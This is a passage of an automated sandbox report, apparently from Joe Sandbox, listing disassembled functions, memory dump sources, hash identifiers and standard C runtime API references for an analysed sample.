Opcode Fuzzy Hash: 326bc5982354ac438e1a9f739f44fe0e5fdd5d63dcd15d05e6311c1e57b5f58c
Instruction Fuzzy Hash: 8171A371A083058FC344CF1AC94164AF7E2FFC8718F19C96DA898C7B21E775E9468B82

Function 6CF43C90 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cdc20a2fddfc9a188b602cbb1ee077ba7ac09752fea693f80eeb2021d0fc81c
Instruction ID: c816e45da3559c3907b7fb3d5880d540d82664f1bd06f7db55950fe47940c881
Opcode Fuzzy Hash: 7cdc20a2fddfc9a188b602cbb1ee077ba7ac09752fea693f80eeb2021d0fc81c
Instruction Fuzzy Hash: 1F51F776A083058FC344CF69C88064AF7E2FBC8318F59C93DE999C7715E675E94A8B81

Function 6CF44970 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba715fd754b714e9d068fda8deb8e9fc5fdebe33215753f3ecb5741719fa00b
Instruction ID: 69990af1b33206951b8dcabbca6b0527f4b1e7b774d6cca876f21f347aff3c55
Opcode Fuzzy Hash: 6ba715fd754b714e9d068fda8deb8e9fc5fdebe33215753f3ecb5741719fa00b
Instruction Fuzzy Hash: 9441D972B042168FCB48CE2ECC4165AF7E6FBC8210B4DC639A859C7B15E734E9498B91

Function 05101672 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076e4d7211e2f9191453193336fc8f51339a25bb021d68305c7995a67b34ab07
Instruction ID: bd1034eabc119cf24a179347c377f610c87d68f06f9b432ecc3db312fbf6a53b
Opcode Fuzzy Hash: 076e4d7211e2f9191453193336fc8f51339a25bb021d68305c7995a67b34ab07
Instruction Fuzzy Hash: 165112B4D402489FDB14DFA9D885BEDBBF1BB49300F20A129E815BB291DBB89845CF45

Function 05101678 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2da5b268492c58278fd1c4940a83e434dff91f4cd12a0e289689720238cbfe2
Instruction ID: 87b927902a059e3652131dd491dbb36e379ce00fbceaa1d56c77556fb8b0645a
Opcode Fuzzy Hash: a2da5b268492c58278fd1c4940a83e434dff91f4cd12a0e289689720238cbfe2
Instruction Fuzzy Hash: B34102B4D003489FDB14DFA9D884BADBBF1BB09300F20A029E815BB290DBB89845CF45

Function 6CF54EE0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b80b022f6fb6ea357ee87fb9d98904a3db7eef287546178533f3b07828e21b
Instruction ID: c94b9159e9205309bb21f59704f46d5f9c2590afdda429f547212ba2e8d2fabc
Opcode Fuzzy Hash: 66b80b022f6fb6ea357ee87fb9d98904a3db7eef287546178533f3b07828e21b
Instruction Fuzzy Hash: 16417E7160C30D4ED35CFEE8A6DB397B6D4E389280F41543F9A018B192FEA0955996D4

Function 00FF1320 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aab586fc9a33fe03fe63b8809012ca4d6769e5d976bd7dcc75d8286fd7064872
Instruction ID: 6589e8663ea6a10acd598cd8a3afaa322bcd5cc5cc5ffeadfedf136e199cd95d
Opcode Fuzzy Hash: aab586fc9a33fe03fe63b8809012ca4d6769e5d976bd7dcc75d8286fd7064872
Instruction Fuzzy Hash: EA414E71D01A588BEB2CCF6BCD4469EFAF3AFC8201F18C1BA850CAA264DA7049459F41

Function 05102E98 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405d69d7cf8efce534202bc965871472036e15a5ad3eef943a8b50fc5e76e964
Instruction ID: 01415a8e0ea15f62746a1fe3cc59706dd7fe333a59e5d732a6b12da3d8d78c69
Opcode Fuzzy Hash: 405d69d7cf8efce534202bc965871472036e15a5ad3eef943a8b50fc5e76e964
Instruction Fuzzy Hash: F1417CB9E012099FCB04CFA8D884AEEBBF1EF49310F159069E915B7320D771AA45CF94

Function 00FF1310 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2018104112.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5091c4b0476efba8a2b298d598829ca7958ef772366f557de2d79af5b0293a1a
Instruction ID: 37e5d784a7bbb74c0772cde68aa681b766d5fd4817bab21989e688e3f0a604d3
Opcode Fuzzy Hash: 5091c4b0476efba8a2b298d598829ca7958ef772366f557de2d79af5b0293a1a
Instruction Fuzzy Hash: FB413071D01A588BEB5CCF6B8D4469EFAF7AFC8201F18C1BAC41DAA265EB7405468F10

Function 0510B098 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe379df58c5a74a391d496bc422e8a68cdd5f0a8e3d04fc1987327a1d588cbe1
Instruction ID: 2f2ae9ae7cfa3edf14654bde10b5fc1da7e01897b99a101eb42d84fb8187476a
Opcode Fuzzy Hash: fe379df58c5a74a391d496bc422e8a68cdd5f0a8e3d04fc1987327a1d588cbe1
Instruction Fuzzy Hash: BD31CCB4D042589FCB10CFA9E884AEEFFF0AB49310F14906AE415B7250C778A949CF64

Function 05102D89 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f93544a983856f4a9580b1fcb04ffd56bc2a7cabd310049a5a7d9bf275d881ad
Instruction ID: 98925d4a24f317888caed71b0b46cfaa7dc47910d5c92268dfdb3b9770a20043
Opcode Fuzzy Hash: f93544a983856f4a9580b1fcb04ffd56bc2a7cabd310049a5a7d9bf275d881ad
Instruction Fuzzy Hash: 6531B3B5E012099FDB04CFA9D880AEEBBF5EF49310F10946AE915B7260DB709A04CB95

Function 0510B0A0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7ee7f12cd4a194bb25abd87b734962d3b20af8a9b67e9873f50dca59056a4c
Instruction ID: d2ef49280642d5c2669fdd5412765e8755fd37ada694316b062f3cbfceab9069
Opcode Fuzzy Hash: 5c7ee7f12cd4a194bb25abd87b734962d3b20af8a9b67e9873f50dca59056a4c
Instruction Fuzzy Hash: 9831DBB4D04258DFCB00CFA9E884AEEFBF4BB49310F14902AE415B7240D778A945CF64

Function 05102D90 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2ca3f7ef0c4c1686647c98c5a4d9fca84302e730af7f46a571d4ba32b65695
Instruction ID: 5a8fb8e06391200d5a4dd70e95df4238abd047af17c7087602e537070843a038
Opcode Fuzzy Hash: 9f2ca3f7ef0c4c1686647c98c5a4d9fca84302e730af7f46a571d4ba32b65695
Instruction Fuzzy Hash: 4331A4B5E01209AFDB04CFA9D480AEEBBF5FF49310F10946AE915B7260DB719A04CB95

Function 6CF06650 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction ID: a5cf2af450336b930a473e899c2e21deb1cbd881c86f2d00c1b08c0cbe14d499
Opcode Fuzzy Hash: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction Fuzzy Hash: 0821E7367165528BD705CE2EC8908A6B7A7EF8D31472981F9E808CF283CA70E956C7D0

Function 6CF08B30 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction ID: e85f029485b2202f814b9c4efedbf437bb1afe386f73623f9a7bd06920eac8cd
Opcode Fuzzy Hash: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction Fuzzy Hash: F1218E757056874BE715CF2EC84059BBBA3EFD9300B1980A7E858DB242C674E866CBC0

Function 6CF0C7B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction ID: 701bf5af761d3ce7bcab3d278a6704389f2a5faa401193176ca0fe838ee0954a
Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction Fuzzy Hash: E9110B3570AA420BF304CF2EE840483B793AFCD71576A85AEA454DF146C771E416C791

Function 0510ABD3 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e0a6df303ee27de7772f4c93136395fda1a167eaf8467c4c744a2fc4b09207
Instruction ID: 0f34120465df0581db811705b7e756b12b9f9a4c5bbe1487101743eeadd461a1
Opcode Fuzzy Hash: f4e0a6df303ee27de7772f4c93136395fda1a167eaf8467c4c744a2fc4b09207
Instruction Fuzzy Hash: F321A8B5D052089FCB10CFA9D984ADEBBF4AB49320F24A01AE819B3350D375A945CFA5

Function 0510ABD8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2022134661.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5100000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37001d30ad155e9b35c7c074e123599c987e6a1aa31fd45550a5087080e77f3
Instruction ID: 29a79cd04e8a14e03e93d062ad01a3079479ef06bd384f3d65eb7be646e98958
Opcode Fuzzy Hash: a37001d30ad155e9b35c7c074e123599c987e6a1aa31fd45550a5087080e77f3
Instruction Fuzzy Hash: EE21A8B5D052088FCB10CFA9D584ADEFBF4BB49320F24A01AE819B3350C375A945CFA5

Function 6CF684B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab283b908b7ec3e322364bd88cbcd983521ffe1667e43ca2f84be1ddf0aa2ab7
Instruction ID: 16f94f9d48cee23e01c4a1f87bfd8b97d0e585e560dc5a134c96d88e63be2bb3
Opcode Fuzzy Hash: ab283b908b7ec3e322364bd88cbcd983521ffe1667e43ca2f84be1ddf0aa2ab7
Instruction Fuzzy Hash: C5115E76A08609EFCB14CF59D94179AFBF4FB45724F20862EE81993B80D735A900CB90

Function 6CF76FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6CF76FCC

Part of subcall function 6CF74147: DName::DName.LIBCMT ref: 6CF7415A
Part of subcall function 6CF74147: DName::operator+.LIBCMT ref: 6CF74161

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 8043250e16c12292fc23a44e73b83c1eeb7d0407085cd9ce2ea8db274c097a9d
Instruction ID: 0d28478c06df20bcc1be954e479801e5a665a3aabe55976710dd2c5ba059f36a
Opcode Fuzzy Hash: 8043250e16c12292fc23a44e73b83c1eeb7d0407085cd9ce2ea8db274c097a9d
Instruction Fuzzy Hash: 04D13C71D10209AFDB21DFA8E885AEEBBB4EF09304F10406BE515E7790DB759A49CB70

Function 6CF6EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ECA5
__mtterm.LIBCMT ref: 6CF6ECB1

Part of subcall function 6CF6E97C: DecodePointer.KERNEL32(00000012,6CF6A397,6CF6A37D,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6E98D
Part of subcall function 6CF6E97C: TlsFree.KERNEL32(0000000A,6CF6A397,6CF6A37D,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6E9A7
Part of subcall function 6CF6E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CF6A397,6CF6A37D,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF72325
Part of subcall function 6CF6E97C: DeleteCriticalSection.KERNEL32(0000000A,?,?,6CF6A397,6CF6A37D,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF7234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CF6ECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CF6ECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CF6ECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CF6ECEE
TlsAlloc.KERNEL32(?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED3E
TlsSetValue.KERNEL32(00000000,?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED59
__init_pointers.LIBCMT ref: 6CF6ED63
EncodePointer.KERNEL32(?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED74
EncodePointer.KERNEL32(?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED81
EncodePointer.KERNEL32(?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED8E
EncodePointer.KERNEL32(?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6ED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6EDBC
__calloc_crt.LIBCMT ref: 6CF6EDD1
DecodePointer.KERNEL32(00000000,?,?,6CF6A2D4,6CF995C0,00000008,6CF6A468,?,?,?,6CF995E0,0000000C,6CF6A523,?), ref: 6CF6EDEB
GetCurrentThreadId.KERNEL32 ref: 6CF6EDFD

Strings

FlsGetValue, xrefs: 6CF6ECC9
FlsSetValue, xrefs: 6CF6ECD6
FlsAlloc, xrefs: 6CF6ECC1
FlsFree, xrefs: 6CF6ECE3
KERNEL32.DLL, xrefs: 6CF6ECA0

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 965fadb44ac21addc1cb181ad4e2d2a86037953997965fa263d26de5662d2802
Instruction ID: 15a7826974d35329565476611899c99fe249ec7d04b252b0cb98339742ccb34b
Opcode Fuzzy Hash: 965fadb44ac21addc1cb181ad4e2d2a86037953997965fa263d26de5662d2802
Instruction Fuzzy Hash: F0317332E21718DFDF91BFB6AC0876E7FF8BB576547350516E46092A90EB328400CB90

Function 6CF10EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF10EF2
std::_Xinvalid_argument.LIBCPMT ref: 6CF10F14
_memmove.LIBCMT ref: 6CF10F70
_memmove.LIBCMT ref: 6CF10F95
_memmove.LIBCMT ref: 6CF10FA9
_memmove.LIBCMT ref: 6CF10FDB
_memmove.LIBCMT ref: 6CF11182
std::_Xinvalid_argument.LIBCPMT ref: 6CF111B6

Strings

string too long, xrefs: 6CF10EED, 6CF10F0F
invalid string position, xrefs: 6CF111B1

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
